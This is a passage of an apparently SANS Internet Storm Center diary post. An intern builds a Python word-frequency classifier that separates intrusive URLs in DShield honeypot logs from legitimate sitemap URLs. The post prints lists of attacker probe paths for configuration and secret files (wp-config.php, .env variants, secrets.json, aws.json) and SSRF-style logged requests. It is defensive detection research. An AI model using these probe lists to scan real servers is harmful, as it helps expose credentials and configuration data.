 ['./Attack Observations/Project/Legit/sitemap_2022_12_30_google_com_cleaned.csv', './Attack Observations/Project/Legit/sitemap_2023_01_03_searchenginejournal_com_cleaned.csv', './Attack Observations/Project/Legit/sitemap_2023_01_08_foreignpolicy_com_cleaned.csv', './Attack Observations/Project/Legit/sitemap_2023_01_11_apple_com_cleaned.csv', './Attack Observations/Project/Legit/sitemap_2023_01_31_washingtonpost_com_cleaned.csv']
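Holding out whole files, rather than individual URLs, keeps the test data completely separate from the dictionaries. If the file lists are sorted by name, the date-stamped filenames also make the held-out files the most recent ones. A sketch of that split: `split_files` is a hypothetical helper, how the author actually built `intrusive_files` and `legit_files` is not shown, and the directory layout below is only inferred from the printed paths. The 20/4 training counts match the slices used later when the dictionaries are built.

```python
import glob
import os


def split_files(paths, n_train):
    """Sort data files by name and split them into (training, held_out) lists.

    With date-stamped names such as 404reports_2025-01-25.csv, sorting by
    name is also chronological, so the held-out files are the most recent.
    """
    paths = sorted(paths)
    return paths[:n_train], paths[n_train:]


if __name__ == '__main__':
    # Layout inferred from the printed paths; the '*.csv' pattern is an assumption
    base = './Attack Observations/Project'
    intrusive_files = glob.glob(os.path.join(base, 'Intrusive', '*.csv'))
    legit_files = glob.glob(os.path.join(base, 'Legit', '*.csv'))
    intrusive_train, intrusive_test = split_files(intrusive_files, 20)
    legit_train, legit_test = split_files(legit_files, 4)
    print(len(intrusive_train), len(intrusive_test), len(legit_train), len(legit_test))
```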

Step 3 (part 1): Isolate the specific suffixes

I reviewed hundreds of URLs from the DShield sensor throughout my internship as part of my daily analysis. This experiment relies on creating a useful list of words, phrases, or other structural commonalities in intrusive web requests, as well as a useful list of legit web requests. I have very little experience setting up public-facing web applications or websites meant for user interaction. To keep things manageable, I decided to focus on two key features when parsing the URLs: the specific words/phrases contained in the URL, and the presence of either a period "." or a dash "-" in the suffix. There is certainly room for improvement, but I have found that many malformed URLs contain periods and dashes as a way to trip logic. There are of course other characters used for SQLi and similar attacks, but again, I kept it simple to start.

The code block that follows defines a function, "parse_url_words", that takes a single URL, uses regular expressions to extract its suffix, and returns a Python list of the individual words/phrases parsed from it.

import re

def parse_url_words(url='https://www.coffee4all.com/subpage1/subpage2'):
    # Returns a list of the unique words/phrases (plus '.' and '-' markers) in a URL suffix

    # Match a leading scheme + FQDN such as 'https://www.site.tld/'; truncated records
    # containing only '/sub1/sub2/etc.' fall through to the second pattern
    extract_domain = re.match(r'https?://.{,3}\..+?\..+?/', url)
    if extract_domain:
        # re.escape() so the dots in the domain are matched literally
        regex = re.compile(rf'(?:{re.escape(extract_domain.group())}|/)(.*?)$')
    else:
        regex = re.compile(r'/(.*?)$')
    url_suffix = regex.findall(url)

    # Error check: account for lines that have no returned value
    if url_suffix == [] or url_suffix == ['']:
        return []
    # split() also handles a suffix without '/', returning it as a one-item list
    url_word_list = url_suffix[0].split('/')

    # Break phrases into smaller parts by splitting on '.' and '-', and note whether
    # either character appeared so it can be added as a word of its own
    additionals = []
    period = False
    dash = False
    for phrase in url_word_list:
        if '.' in phrase:
            additionals += phrase.split('.')
            period = True
        if '-' in phrase:
            additionals += phrase.split('-')
            dash = True
    if period:
        url_word_list.append('.')
    if dash:
        url_word_list.append('-')
    url_word_list += additionals

    # Deduplicate, then drop the empty string left by leading/trailing separators
    url_word_list = list(set(url_word_list))
    if '' in url_word_list:
        url_word_list.remove('')
    return url_word_list

# Test the function
test_legit_URL = parse_url_words('https://www.coffee4me.plzzz/top/order/pay/to-us')
print(len(test_legit_URL), '\n', test_legit_URL)

7
 ['us', '-', 'pay', 'order', 'top', 'to', 'to-us']

Step 3 (part 2): Build Dictionaries of Words

Using the parse_url_words function, I then looped over both directories to build datasets called "legit" and "intrusive". The reader may observe that the code block below uses a Counter() dictionary. Although the data sources were not extremely large (a potential weakness of the experiment, discussed further in the conclusion), it was apparent that using Python lists would result in large numbers of repeats. For memory and time efficiency, a Counter dictionary automatically reduces the data to unique values. It would have been possible to accomplish this using Python sets (as is done when parsing an individual URL); however, I like the added functionality and speed a dictionary provides for larger data sets. A Counter dictionary specifically allowed me to store the frequency of each word/phrase in the values (since the words/phrases themselves are the keys). Although this frequency classification does not make use of the Counter's added functionality, it will no doubt be useful when I build on the experiment later.

from collections import Counter

# Legit words from the first 4 files (preserving two for testing)
legit = Counter()
for file in legit_files[0:4]:
    with open(file, 'rb') as fh:
        for url_line in fh:  # iterate line by line; some sample datasets are large enough to exhaust memory
            content = url_line.decode().lower().strip()
            legit.update(parse_url_words(content))

# Intrusive words from the first 20 files (preserving 5 for testing)
intrusive = Counter()
for file in intrusive_files[0:20]:
    with open(file, 'rb') as fh:
        for url_line in fh:  # iterate line by line; some sample datasets are large enough to exhaust memory
            content = url_line.decode().lower().strip()
            intrusive.update(parse_url_words(content))

# Display 100 words (entries 100-199) from each dictionary
print(f'Total number of words in Legit: {len(legit)}\n')
print(list(legit.keys())[100:200], '\n')
print(f'Total number of word in Intrusive: {len(intrusive)}\n')
print(list(intrusive.keys())[100:200])

Total number of words in Legit: 490321  [TRUNCATED]

['zh_hk', 'signup_complete', 'signup_complete.html,', '.', 'html,', 'mediatools', 'get', 'develop', 'develop.html,', 'engage.html,', 'engage', 'gather.html,', 'gather', 'publish', 'publish.html,', 'resources.html,', 'resources', 'search', 'search.html,', 'visualize', 'visualize.html,', 'videoqualityreport', 'm', 'faq.html,', 'faq', 'faster', 'web.html,', 'faster-web', 'faster-web.html,', 'how.html,', 'how', 'methodology', 'methodology.html,', 'youtube', 'youtube.html,', 'cardboard', 'apps', 'android', 'buy', 'buy-cardboard-android', 'ios', 'buy-cardboard-ios', 'buy-cardboard', 'developers', 'download', 'get-cardboard', 'jump', 'manufacturers', 'product-safety', 'safety', 'product', 'sundance', 'viewerprofilegenerator', 'es_mx', 'fr_ca', 'pt_br', 'pt_pt', 'plastic', 'expire.html,', 'expire', 'journalismfellowship', 'thankyou', 'thankyou.html,', 'noto', 'feedback', 'cjk', 'help', 'emoji', 'activities', 'activities.html,', 'nature.html,', 'animals-nature', 'animals-nature.html,', 'animals', 'flags.html,', 'flags', 'food-drink.html,', 'drink.html,', 'food-drink', 'food', 'objects.html,', 'objects', 'smileys', 'smileys-people', 'smileys-people.html,', 'people.html,', 'symbols', 'symbols.html,', 'travel-places.html,', 'travel', 'places.html,', 'travel-places', 'guidelines', 'install', 'updates', 'projectlink', 'google2ba69e9df6ccb5fb.html,', 'google2ba69e9df6ccb5fb', 'spectrumdatabase', 'business'] 

Total number of word in Intrusive: 12608 [TRUNCATED]

['config.ini', 'hnap1', 'secrets', 'secrets.json', 'wp-config.php', 'products', 'view.php', 'src', 'settings.js', 'main.js', 'main', 'server', 'server-info', 'bundleconfig.json', 'bundleconfig', 'wp-content', 'debug.log', 'content', 'phpversion', 'phpversion.php', 'secrets.yml', 'services.php', 'debug.php', 'production.json', 'production', 'php~', 'config.php~', 'wp-config.php~', '.env.local', 'local', 'broadcasting.php', 'broadcasting', 'settings.json', 'server.js', 'config.env', 'env.json', 'file', 'status', 'server-status', 'keys.js', 'keys', 'application.properties', 'properties', 'test1.php', 'test1', 'mail.php', 'mail', 'environment', 'environment.ts', 'ts', 'acl', 'acl.config.php', 'library', 'global.php', 'autoload', 'global', 'phpconf.php', 'phpconf', 'session.php', 'session', '.env.bak', 'bak', 'wp-config.org', 'config.org', 'org', 'database.yml', 'database', 'config.json', 'default.json', 'index.js', 'bootstrap', 'resources', 'bootstrap.yml', 'test.json', 'dev', 'php.php', 'php_info.php', 'php_info', 'test2.php', 'test2', 'database.php', '.env.dev', 'tmp', 'index.html', 'server.php', 'test.config.php', 'front', 'queue.php', 'queue', 'config.properties', 'aws.json', 'config.bak', 'wp-config.bak', 'crm', 'xampp', 'users', 'prod', 'admins', 'infos.php', 'infos']
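One detail worth noting about these Counters: because parse_url_words deduplicates the pieces of each URL before returning them, the stored counts are effectively document frequencies, meaning the number of URLs that contain each word rather than its total number of occurrences. A small illustration with made-up parsed word lists (not real DShield data):

```python
from collections import Counter

# Made-up outputs of a URL parser that returns unique pieces per URL
parsed_urls = [
    ['wp-config.php', 'wp', 'config.php', '.', '-'],
    ['.env', 'env', '.'],
    ['wp-config.php', 'wp', 'config.php', '.', '-'],
]

doc_freq = Counter()
for words in parsed_urls:
    doc_freq.update(words)  # each word counts once per URL it appears in

print(len(doc_freq))            # 7 unique words
print(doc_freq.most_common(1))  # [('.', 3)]
# Share of URLs containing 'wp' (2 of 3): the kind of statistic a later model could use
print(doc_freq['wp'] / len(parsed_urls))
```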

Step 4: Using Frequency to Categorize a URL as Intrusive or Legit

The reader may question whether the significant size difference between the two dictionaries will skew the results. This is fair, and ideally it would be addressed by finding more sources of malformed URLs (which I will do as I move forward). However, I would expect the malformed URL dictionary to be much smaller: there are likely many more variations of legitimate URLs than intrusive ones (only an assumption at this point), and the source of the intrusive URLs is currently the DShield sensor, whose logs reveal a high number of repeated attempts using lists of URLs (much like lists of common passwords).

Frequency is simply a measure of how often something occurs in a set of data. To classify a random URL as either Intrusive or Legit by frequency means determining whether its words and phrases, when parsed into a list, include more items that appear in the "Legit" dataset or more items that appear in the "Intrusive" dataset.

The code block that follows defines a function called "url_word_count" that passes an individual URL to the URL parsing function above and returns a tuple with the number of its words/phrases present in the legit dictionary and the number present in the intrusive dictionary.

The function called "frequency_classifier" will receive a full file of URLs, make use of the url_word_count and then classify each URL as legitimate or intrusive. It will then display the results.

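def url_word_count(url='https://www.coffee4all.com/subpage1/subpage2'):
    # Split the URL into words/phrases with the parsing function defined earlier
    all_words = parse_url_words(url)
    # Count how many of those words appear in each frequency dictionary
    # (a membership test on a dict checks its keys directly)
    url_legit_words = [word for word in all_words if word in legit]
    url_intrusive_words = [word for word in all_words if word in intrusive]
    return len(url_legit_words), len(url_intrusive_words)

def frequency_classifier(filename):
    legit_urls = 0
    intrusive_urls = 0
    total = 0
    with open(filename, 'rb') as fh:
        for url_line in fh:
            content = url_line.decode().lower().strip()
            # Skip bare root requests, which carry no words to compare
            if content == '/':
                continue
            # Distinct local names avoid shadowing the global legit/intrusive dictionaries
            legit_count, intrusive_count = url_word_count(content)
            # Ties (including 0-0, when no word is in either dictionary) count as legit
            if legit_count >= intrusive_count:
                legit_urls += 1
            else:
                intrusive_urls += 1
            total += 1
    print(f'File Name: {filename}')
    print(f'Total URLs in the file: {total}')
    if total == 0:
        # Avoid dividing by zero on an empty (or root-only) file
        return
    print(f'Predicted Legit URLs: {legit_urls}\tPercentage: {legit_urls/total:.2%}')
    print(f'Predicted Intrusive URLs: {intrusive_urls}\tPercent Intrusive: {intrusive_urls/total:.2%}\n')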
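Because url_word_count depends on parse_url_words and on the legit/intrusive dictionaries built in earlier steps, here is a minimal self-contained sketch of the same counting rule. The tokenizer regex, the toy dictionaries, and the names tokenize, word_counts, and classify are hypothetical stand-ins, not the parser or data used in this experiment; the sketch only illustrates how the comparison works and how ties fall to legit.

```python
import re

# Hypothetical tokenizer: split the URL on common delimiters.
# This is NOT the parse_url_words() regex used in the article.
def tokenize(url: str) -> list[str]:
    return [w for w in re.split(r"[/?&=.:_\-]+", url.lower()) if w]

# Toy frequency dictionaries (word -> count), made up for illustration only
legit = {"news": 120, "sports": 40, "2023": 75, "article": 90}
intrusive = {"wp": 30, "config": 55, "php": 80, "env": 25}

def word_counts(url: str) -> tuple[int, int]:
    words = tokenize(url)
    # Summing booleans counts how many words are keys of each dictionary
    return sum(w in legit for w in words), sum(w in intrusive for w in words)

def classify(url: str) -> str:
    legit_count, intrusive_count = word_counts(url)
    # Same rule as frequency_classifier: ties, including 0-0, count as legit
    return "LEGIT" if legit_count >= intrusive_count else "INTRUSIVE"

for url in ["/news/2023/sports-article", "/wp-config.php", "/robots.txt"]:
    print(url, word_counts(url), classify(url))
```

With these toy dictionaries, /robots.txt matches nothing in either one, scores (0, 0), and is labeled LEGIT purely because of the tie rule.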

As a reminder, the test data was set aside and not used to build the legit/intrusive dictionaries, but it comes from the same sources, so we know which category the frequency classifier "should" assign. This provides a way to check the classifier against known data.

The code below runs the classifier on the legit and intrusive test data files and lists the percentage of URLs it assigned to each category. An ideal score would be 100% of URLs predicted Legit for the legitimate test data and 100% predicted Intrusive for the intrusive test data.

# Held-out test data: the last two legit files (items 5-6) and the last five intrusive files

print("Test data results for Legitimate Files\n",50*'-')
for file in legit_files[-2:]:
    frequency_classifier(file)

print("\nTest data results for Intrusive Files\n",50*'-')
for file in intrusive_files[-5:]:
    frequency_classifier(file)

Test data results for Legitimate Files
 --------------------------------------------------
File Name: ./Attack Observations/Project/Legit/sitemap_2023_01_31_washingtonpost_com_cleaned.csv
Total URLs in the file: 847794
Predicted Legit URLs: 847792    Percentage: 100.00%
Predicted Intrusive URLs: 2     Percent Intrusive: 0.00%

File Name: ./Attack Observations/Project/Legit/sitemap_2023_03_16_economist_com_cleaned.csv
Total URLs in the file: 190424
Predicted Legit URLs: 190424    Percentage: 100.00%
Predicted Intrusive URLs: 0     Percent Intrusive: 0.00%

Test data results for Intrusive Files
 --------------------------------------------------
File Name: ./Attack Observations/Project/Intrusive/404reports_2025-03-15.csv
Total URLs in the file: 591
Predicted Legit URLs: 128       Percentage: 21.66%
Predicted Intrusive URLs: 463   Percent Intrusive: 78.34%

File Name: ./Attack Observations/Project/Intrusive/404reports_2025-03-16.csv
Total URLs in the file: 137
Predicted Legit URLs: 10        Percentage: 7.30%
Predicted Intrusive URLs: 127   Percent Intrusive: 92.70%

File Name: ./Attack Observations/Project/Intrusive/404reports_2025-03-17.csv
Total URLs in the file: 579
Predicted Legit URLs: 2 Percentage: 0.35%
Predicted Intrusive URLs: 577   Percent Intrusive: 99.65%

File Name: ./Attack Observations/Project/Intrusive/404reports_2025-03-18.csv
Total URLs in the file: 1366
Predicted Legit URLs: 2 Percentage: 0.15%
Predicted Intrusive URLs: 1364  Percent Intrusive: 99.85%

File Name: ./Attack Observations/Project/Intrusive/404reports_2025-03-19.csv
Total URLs in the file: 348
Predicted Legit URLs: 2 Percentage: 0.57%
Predicted Intrusive URLs: 346   Percent Intrusive: 99.43%

Analysis of Test Results

The test runs showed that a simple frequency comparison of the words or phrases contained in URL suffixes accurately predicted that legitimate URLs were in fact legitimate: only 2 of the more than one million legitimate test URLs were misclassified. The intrusive tests were less consistent. The March 17-19 files were classified with over 99% accuracy, but the URLs contained in the web honeypot logs from March 15 and March 16 had significant classification errors, with 21.66% and 7.30% of them, respectively, predicted as legitimate.
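To put the per-file percentages in perspective, the printed counts can be pooled across the test files. This short sketch only reuses the numbers from the output above; the dictionary layout and the pooled_rate helper are illustrative.

```python
# (total URLs, predicted legit, predicted intrusive) per test file, copied from the output above
legit_tests = {
    "washingtonpost_com": (847794, 847792, 2),
    "economist_com": (190424, 190424, 0),
}
intrusive_tests = {
    "2025-03-15": (591, 128, 463),
    "2025-03-16": (137, 10, 127),
    "2025-03-17": (579, 2, 577),
    "2025-03-18": (1366, 2, 1364),
    "2025-03-19": (348, 2, 346),
}

def pooled_rate(results: dict, index: int) -> float:
    """Share of all URLs whose prediction is at position `index` (1 = legit, 2 = intrusive)."""
    total = sum(r[0] for r in results.values())
    return sum(r[index] for r in results.values()) / total

legit_correct = pooled_rate(legit_tests, 1)          # legit URLs predicted legit
intrusive_correct = pooled_rate(intrusive_tests, 2)  # intrusive URLs predicted intrusive
print(f"Legit test URLs correctly classified: {legit_correct:.4%}")
print(f"Intrusive test URLs correctly classified: {intrusive_correct:.2%}")
```

Pooled, this gives 99.9998% for the legitimate test URLs and 95.23% (2877 of 3021) for the intrusive ones. Of the 144 intrusive URLs predicted legitimate, 138 come from the March 15 and March 16 files.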

I performed an in-depth analysis of the files in question, using a code block to print out the URLs the classifier had labeled as legitimate even though they were in the known intrusive test set. I was rather put off to discover that a few of these URLs had made it past the frequency classifier:

URL: http://api.ipify.org/      LEGIT  number 108
URL: /credentials       LEGIT  number 109
URL: /robots.txt        LEGIT  number 110
URL: /ping_pong.php     LEGIT  number 111
URL: /robots.txt        LEGIT  number 112
URL: http://api.ipify.org/      LEGIT  number 113
URL: http://the-cat.click/validate      LEGIT  number 114
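The code block used for that analysis isn't shown here, but a minimal sketch of the idea might look like the following. It accepts any scoring function that returns (legit, intrusive) counts, such as url_word_count, and yields the URLs from a known-intrusive list that the >= rule would label legitimate. The function name find_false_legit, the toy scorer, and the sample URLs are hypothetical, and "number" here is simply the URL's position in the input.

```python
from typing import Callable, Iterable, Iterator

def find_false_legit(
    urls: Iterable[str],
    score: Callable[[str], tuple[int, int]],
) -> Iterator[tuple[int, str]]:
    """Yield (position, URL) for known-intrusive URLs the frequency rule calls legit."""
    for number, raw in enumerate(urls, start=1):
        url = raw.strip().lower()
        if url == "/":  # frequency_classifier skips bare root requests too
            continue
        legit_count, intrusive_count = score(url)
        if legit_count >= intrusive_count:  # same tie-breaking rule as the classifier
            yield number, url

# Toy scorer for illustration only: counts a few hypothetical "intrusive" keywords
def toy_score(url: str) -> tuple[int, int]:
    keywords = ("config", "php", ".env")
    return 0, sum(k in url for k in keywords)

sample = ["/wp-config.php", "/robots.txt", "/.env", "http://api.ipify.org/"]
for number, url in find_false_legit(sample, toy_score):
    print(f"URL: {url}\tLEGIT\tnumber {number}")
```

Passing the real url_word_count as `score` would reproduce the same kind of listing against the actual dictionaries.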

The presence of a URL like /robots.txt means it was not in the training data that built the word dictionaries, which highlights the risk of incomplete data when relying on only one source (in this case DShield logs). Because the classifier labels a URL legitimate whenever its legit count is greater than or equal to its intrusive count, any URL whose words are missing from the intrusive dictionary (a 0-0 tie included) is labeled legitimate by default. A larger disappointment to me was the presence of full URLs within the URL suffix. These represent an opportunity to perform server-side request forgery (SSRF), which can be used to reveal restricted information, to have the server request something on the attacker's behalf from a third party that trusts it, or even to reveal instance metadata (in the case of a cloud-based server or container).
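One possible complement, which was not part of this experiment, is a simple rule applied before any frequency scoring that flags request targets carrying a full URL, whether as the whole target (as with http://api.ipify.org/) or embedded in the path or query string. The sketch below is a hypothetical heuristic using only the Python standard library; the regex and the has_embedded_url name are assumptions, and a real filter would need to handle double encoding and other evasions.

```python
import re
from urllib.parse import unquote

# Hypothetical pattern: a URI scheme followed by "://" anywhere in the request target
EMBEDDED_URL = re.compile(r"[a-z][a-z0-9+.\-]*://", re.IGNORECASE)

def has_embedded_url(request_target: str) -> bool:
    """Return True if the request target is, or contains, an absolute URL."""
    # Decode percent-encoding once so that http%3A%2F%2F... is caught as well
    return bool(EMBEDDED_URL.search(unquote(request_target)))

# Made-up request targets for illustration
for target in ["http://api.ipify.org/",
               "/proxy?url=http%3A%2F%2F169.254.169.254%2F",
               "/robots.txt"]:
    print(target, has_embedded_url(target))
```

A rule like this would have caught the two absolute URLs in the list above, while /robots.txt and /ping_pong.php would still depend on better dictionary coverage.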

Final Thoughts

The frequency classifier performed well for a first attempt by an admitted rookie to intrusion analysis. Though simple, it proved to be a useful and different way for me to gain experience as part of my internship program, and this is only the beginning. There are several weaknesses I need to address, among them: the extremely broad set of legitimate URL structures out there, my simplistic regular expression that parses the URLs, and the statistical model used. I plan to improve upon the experiment, attempting more sophisticated models as I gain experience in both intrusion analysis and machine learning techniques.

As a final note, I would like to acknowledge the work of SANS Instructor David Hoelzer in authoring the material for SEC595. It is this work that provided me the idea and starting point to attempt techniques from those class labs to apply to my DShield we

[1] https://www.sans.org/cyber-security-courses/applied-data-science-machine-learning/
[2] https://www.sans.edu/cyber-security-programs/bachelors-degree/
-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu
